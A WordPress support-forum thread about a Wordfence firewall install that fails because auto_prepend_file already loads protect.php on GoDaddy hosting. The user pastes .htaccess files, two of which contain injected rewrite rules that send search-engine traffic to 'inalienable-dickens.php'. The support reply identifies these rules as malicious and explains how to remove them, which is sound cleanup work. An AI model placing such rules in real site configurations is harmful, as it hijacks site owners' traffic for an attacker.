/var/chroot/home/content/protect.php

Viewing 8 replies - 1 through 8 (of 8 total)
  • curiozities

    (@curiozities)

    10 years, 1 month ago

    I’m in the same boat as Mighty Good above ^

    wfasa

    (@wfasa)

    10 years, 1 month ago

    Hello Mighty Good,
    could you explain the problem you are experiencing a bit more?

    Thread Starter Mighty Good

    (@mighty-good)

    10 years, 1 month ago

    Thanks wfasa…
    A
    ttempting to engage the firewall aspect of your latest update.

    On the site in question, I get this message…
    The Wordfence Web Application Firewall is designed to run via a PHP ini setting called auto_prepend_file in order to ensure it runs before any potentially vulnerable code runs. This PHP setting is currently in use, and is including this file:

    /var/chroot/home/content/protect.php
    If you don’t recognize this file, please contact us on the WordPress support forums before proceeding.

    You can proceed with the installation and we will include this from within our wordfence-waf.php file which should maintain compatibility with your site, or you can opt to override the existing PHP setting.

    I then click on “Include this file (Recommended) ; and then the following appears…

    To be as secure as possible, the Wordfence Web Application Firewall is designed to run via a PHP ini setting called auto_prepend_file in order to ensure it runs before any potentially vulnerable code runs.

    NOTE: If you have separate WordPress installations with Wordfence installed within a subdirectory of this site, it is recommended that you perform the Firewall installation procedure on those sites before this one.
    We’ve preselected your server configuration based on our tests, but if you know your web server’s configuration, please select it now.

    I click Continue; download .htaccess; click continue again and then I get this message…

    The changes have not yet taken effect. If you are using LiteSpeed or IIS as your web server or CGI/FastCGI interface, you may need to wait a few minutes for the changes to take effect since the configuration files are sometimes cached. You also may need to select a different server configuration in order to complete this step, but wait for a few minutes before trying. You can try refreshing this page.

    I wait but nothing happens; I refresh, nothing happens…

    I do not know which server configuration to attempt, as this site is in a shared GoDaddy setup.

    I could do the alternate method — but I am so “over” GoDaddy’s lack of support to discover what I need (I have a File Manager, not a cPanel).

    Don’t know if you can help, but I sure have given you a lot of info! 🙂

    Thanks

    wfasa

    (@wfasa)

    10 years, 1 month ago

    Hello Mighty Good,
    thank you very much for elaborating. I agree that was a lot of good info! 🙂 If you check in the root of your site can you find any rules related to “Wordfence WAF” in files called .htaccess or .user.ini?

    Thread Starter Mighty Good

    (@mighty-good)

    10 years, 1 month ago

    Hi,

    There is no note in .htaccess — but there is a line
    RewriteRule ^(.*)$ inalienable-dickens.php?$1 [L] in the one i I downloaded when attempting to make the firewall engage.

    inalienable-dickens.php has shown up in other error messages on this site — what is it?

    in .user.ini — which folder would that be located in? GoDaddy is the host.

    Thanks!

    wfasa

    (@wfasa)

    10 years, 1 month ago

    Hello again,
    I have no idea what “inalienable-dickens” is and it doesn’t turn up much on googling so that doesn’t look very good. It’s possible that that line was written by some malicious code.

    user.ini would be in the root of your site.

    If you look at your .htaccess right now what does it look like?

    Thread Starter Mighty Good

    (@mighty-good)

    10 years, 1 month ago

    Thanks for getting back…

    I looked in the /webroot folder and could not locate a user.ini file

    There are three different versions of the .htaccess — 2 in the file system, and one that downloads to my computer when I follow the instructions for the firewall…

    Copying them all here…

    ——
    .htaccess in /webroot folder last dated 12/17/15

    RewriteEngine On

    RewriteCond %{ENV:REDIRECT_STATUS} 200
    RewriteRule ^ – [L]
    RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
    RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
    RewriteRule ^(.*)$ inalienable-dickens.php?$1 [L]

    # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index\.php$ – [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </IfModule>

    # END WordPress

    ———-

    also located /webroot/wordpress last dated 05/02/2011 (only file in this sub-folder)

    # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index\.php$ – [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </IfModule>

    # END WordPress

    ——–

    And another version is downloads to my computer when I follow instructions to setup the firewall

    RewriteEngine On

    RewriteCond %{ENV:REDIRECT_STATUS} 200
    RewriteRule ^ – [L]
    RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
    RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
    RewriteRule ^(.*)$ inalienable-dickens.php?$1 [L]

    # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index\.php$ – [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </IfModule>

    # END WordPress
    —————

    Wowser!

    wfasa

    (@wfasa)

    10 years ago

    Hello Mighty Good,
    okay the first one (dated 12/17/15) contains a redirect exploit. What it would do if this file was the one actually being loaded on your site (i can not guarantee that it is since you have several) is that it would redirect all your incoming organic traffic (traffic from search engines) to the file “inalienable-dickens.php”.

    So you want to a) check for a file called “inalienable-dickens.php” on your server remove it if you find it and b) remove everything in that .htaccess above the line # BEGIN WordPress.

    Now to your actual question. Your Wordfence firewall can not install because it needs to use auto_prepend_file but auto_prepend_file is already being used to include /var/chroot/home/content/protect.php. I am assuming the “protect.php” is some kind of firewall but I can not promise you this. The only solution is that you contact your web host and ask them why “protect.php” is included via auto_prepend_file and if they can help you resolve the conflict.

Viewing 8 replies - 1 through 8 (of 8 total)

The topic ‘/var/chroot/home/content/protect.php’ is closed to new replies.

  • 8 replies
  • 3 participants
  • Last reply from: wfasa
  • Last activity: 10 years ago
  • Status: resolved